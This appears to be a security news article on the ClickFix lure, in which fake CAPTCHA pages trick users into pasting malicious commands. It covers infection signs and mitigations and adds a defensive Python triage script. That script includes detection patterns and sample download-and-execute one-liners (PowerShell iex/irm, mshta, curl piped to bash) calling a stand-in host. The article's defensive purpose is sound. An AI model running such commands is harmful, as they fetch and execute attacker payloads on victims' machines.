ClickFix Attack - New Malware Technique Uncovered
In short: a social-engineering trick gets users to run a malicious command on their own machine, handing the attacker a foothold without any exploit.
The ClickFix technique tricks users into running malicious commands on their own devices. It targets both Windows and macOS users and has been used against a wide range of industries. Because the victim, not a software vulnerability, launches the malware, user awareness and controls on the launch points the lure abuses (the Windows Run dialog, PowerShell, the macOS Terminal) are the main defenses.
What Happened
A social engineering technique known as ClickFix has emerged, targeting users on both Windows and macOS. This method tricks individuals into manually executing malicious commands, leading to the silent installation of malware. Initially documented in late 2023, ClickFix has rapidly evolved into a prevalent tactic among cybercriminals. Instead of exploiting software vulnerabilities, it uses a deceptive interface that mimics trusted services like Cloudflare CAPTCHA or Google reCAPTCHA.
The attack begins with a fake verification screen, styled as a CAPTCHA or a "verify you are human" check. When the user clicks the button, JavaScript on the page silently writes a command to the clipboard (the browser's navigator.clipboard.writeText API needs only a user click, not a permission prompt, to write). The page then shows step-by-step "fix" instructions: on Windows, press Win+R to open the Run dialog, Ctrl+V to paste, Enter to run; on macOS, paste the command into Terminal. No exploit is involved; the victim launches the first stage by hand, and that command fetches and runs the attacker's payload. Recorded Future's Insikt Group identified five distinct clusters of ClickFix activity, each using the same lure pattern against different sectors, including accounting and travel.
Who's Being Targeted
ClickFix has proven effective across a wide range of industries. The impersonated services include well-known brands like Intuit QuickBooks, Booking.com, and Birdeye. Victims span sectors such as accounting, travel, real estate, and legal services. The method's adaptability makes it a favorite among cybercriminals and potentially state-sponsored actors, including APT28 and North Korea’s PurpleBravo. As this technique continues to evolve, its impact on businesses and individual users could be significant.
Signs of Infection
The ClickFix attack follows a consistent four-stage chain: an obfuscated input (the pasted command, often Base64-encoded or otherwise disguised), execution by a native shell (PowerShell on Windows, sh or zsh via Terminal on macOS), retrieval of the payload from a remote server, and in-memory execution so that little or nothing is written to disk. On Windows the pasted command typically launches PowerShell with a hidden window and an execution-policy bypass and pipes a downloaded script into Invoke-Expression, or hands a URL to another script host such as mshta.exe; on macOS the Terminal command fetches and runs a payload such as the MacSync stealer. Where persistence is established, it is often a shortcut in the user's Startup folder (%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup), so the malware reactivates after each reboot.
The payload may be fileless, but the hand-off leaves traces worth hunting for. On Windows, the Run dialog records each command under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU; process telemetry (Sysmon Event ID 1, EDR) shows explorer.exe as the parent of powershell.exe or mshta.exe with a URL on the command line; and PowerShell script block logging (Event ID 4104) captures the decoded script. On macOS, the pasted command appears in the user's shell history (for example ~/.zsh_history) and the downloader runs as a child of the Terminal's shell.
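As an added example (not code from the article, Recorded Future, or any vendor), the following Python script turns the signs above into triage logic. It scores process-creation events for the shape a pasted ClickFix command leaves (hidden PowerShell window, execution-policy bypass, remote fetch plus Invoke-Expression, mshta with a URL, curl piped to a shell on macOS, and explorer.exe as the parent of a script host), and it recovers Run-dialog history from a .reg export of the RunMRU key so the same scoring can be applied to a suspected victim's registry. The indicator patterns, their weights, the alert threshold of 4, and the sample events and registry export are the author's own constructed assumptions, not real telemetry.

```python
"""Heuristic triage of ClickFix-style pasted commands (added example; not the
article's or any vendor's code). Patterns, weights, threshold and the sample
data are the author's assumptions and should be tuned on real telemetry."""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    host: str
    platform: str  # "windows" or "macos"
    parent: str    # parent image, e.g. explorer.exe or zsh
    image: str     # child image
    cmdline: str


# (regex, label, weight): a pasted ClickFix one-liner usually hits several.
WINDOWS_INDICATORS = [
    (r"(?i)-w(?:indowstyle)?\s+h(?:idden)?\b", "hidden window", 2),
    (r"(?i)-e(?:xecutionpolicy|p)?\s+bypass\b", "execution policy bypass", 2),
    (r"(?i)\b(?:iex|invoke-expression)\b", "in-memory eval", 2),
    (r"(?i)\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", "remote fetch", 2),
    (r"(?i)\bmshta(?:\.exe)?\s+https?://", "mshta remote HTA", 3),
    (r"(?i)-enc(?:odedcommand)?\s+[A-Za-z0-9+/=]{40,}", "encoded command", 2),
    (r"(?i)https?://", "URL in command line", 1),
]
MACOS_INDICATORS = [
    (r"(?i)\bcurl\b.*\|\s*(?:ba|z)?sh\b", "curl piped to shell", 3),
    (r"(?i)\bbase64\s+(?:-d|--decode)\b", "base64 decode", 2),
    (r"(?i)\bnohup\b|&\s*$", "backgrounded", 1),
    (r"(?i)https?://", "URL in command line", 1),
]
# Script hosts that Win+R (explorer.exe) spawns for a pasted command.
RUN_DIALOG_CHILDREN = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe"}
ALERT_THRESHOLD = 4  # assumed cut-off; raise it if benign admin one-liners are noisy


def score_event(ev):
    """Return (score, matched labels) for one process-creation event."""
    patterns = MACOS_INDICATORS if ev.platform == "macos" else WINDOWS_INDICATORS
    score, hits = 0, []
    for pattern, label, weight in patterns:
        if re.search(pattern, ev.cmdline):
            score, hits = score + weight, hits + [label]
    # Launch context: the Run dialog hands the command to explorer.exe, so a
    # script host whose parent is explorer.exe is the ClickFix signature itself.
    if (ev.platform == "windows" and ev.parent.lower() == "explorer.exe"
            and ev.image.lower() in RUN_DIALOG_CHILDREN):
        score, hits = score + 2, hits + ["script host spawned by explorer.exe"]
    return score, hits


def scan(events):
    """Alerts for events scoring at or above ALERT_THRESHOLD, highest score first."""
    alerts = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= ALERT_THRESHOLD:
            alerts.append({"host": ev.host, "score": score, "hits": hits, "cmdline": ev.cmdline})
    return sorted(alerts, key=lambda a: a["score"], reverse=True)


def parse_runmru_export(reg_text):
    """Run-dialog history from a .reg export of HKCU\\...\\Explorer\\RunMRU, most
    recent first. Each entry is stored as '<command>\\1'; MRUList orders them."""
    values = {}
    for line in reg_text.splitlines():
        m = re.match(r'^"([^"]+)"="(.*)"$', line.strip())
        if m:  # undo .reg escaping of backslash and quote
            values[m.group(1)] = re.sub(r'\\(["\\])', r"\1", m.group(2))
    order = values.pop("MRUList", "")
    return [values[k][:-2] if values[k].endswith("\\1") else values[k]
            for k in order if k in values]


def events_from_run_history(host, commands):
    """Model each Run-dialog entry as explorer.exe spawning its first token."""
    events = []
    for cmd in commands:
        tokens = cmd.split()
        if not tokens:
            continue
        image = tokens[0].lower()
        image = image if image.endswith(".exe") else image + ".exe"
        events.append(ProcessEvent(host, "windows", "explorer.exe", image, cmd))
    return events


# Constructed sample telemetry and registry export (not real captures).
SAMPLE_EVENTS = [
    ProcessEvent("win-01", "windows", "explorer.exe", "powershell.exe",
                 'powershell -w hidden -ep bypass -c "iex(irm https://example.invalid/v)"'),
    ProcessEvent("win-02", "windows", "explorer.exe", "mshta.exe",
                 "mshta https://example.invalid/verify.hta"),
    ProcessEvent("win-03", "windows", "cmd.exe", "powershell.exe",
                 "powershell -File C:\\scripts\\backup.ps1"),
    ProcessEvent("mac-01", "macos", "zsh", "bash", "curl -s https://example.invalid/i | bash"),
]
SAMPLE_RUNMRU = r'''
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"MRUList"="ba"
"a"="notepad\\1"
"b"="powershell -w hidden -ep bypass -c \"iex(irm https://example.invalid/v)\"\\1"
'''

if __name__ == "__main__":
    events = SAMPLE_EVENTS + events_from_run_history("win-01", parse_runmru_export(SAMPLE_RUNMRU))
    for a in scan(events):
        print(f"{a['host']} score={a['score']} {a['hits']}\n    {a['cmdline']}")
```

Run it directly to print the alerts for the constructed samples. The launch-context rule matters more than any single keyword: an administrator typing irm | iex in a terminal will also score, but explorer.exe spawning powershell.exe or mshta.exe with a URL on the command line is rare in normal use and deserves a rule of its own.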
How to Protect Yourself
To mitigate ClickFix, users and organizations should layer several controls. On Windows, the Run dialog can be removed through Group Policy (User Configuration > Administrative Templates > Start Menu and Taskbar > Remove Run menu from Start Menu, which sets the NoRun value under HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer); note that newer variants steer the victim to other launch points, such as the File Explorer address bar or a PowerShell window, so this closes one door rather than all of them. Enforcing PowerShell Constrained Language Mode through AppLocker or Windows Defender Application Control restricts what an untrusted script can do (no arbitrary .NET or COM access), which breaks most of the loaders these one-liners fetch, and the same policies can block unapproved scripts and script hosts outright; enabling PowerShell script block logging gives responders the decoded script afterwards. For macOS users, restricting Terminal access through mobile device management limits who can run a pasted command at all; System Integrity Protection should stay enabled, though it does not stop a user-level command and only limits what the payload can modify afterwards. Targeted user awareness training on "paste this command to verify you are human" prompts addresses the root of the technique, since no exploit is involved. Finally, keep SIEM and EDR content current with threat intelligence so newly identified command-and-control and payload domains are blocked, and add a detection for script hosts (powershell.exe, mshta.exe) launched by explorer.exe with a URL on the command line.
Cyber Security News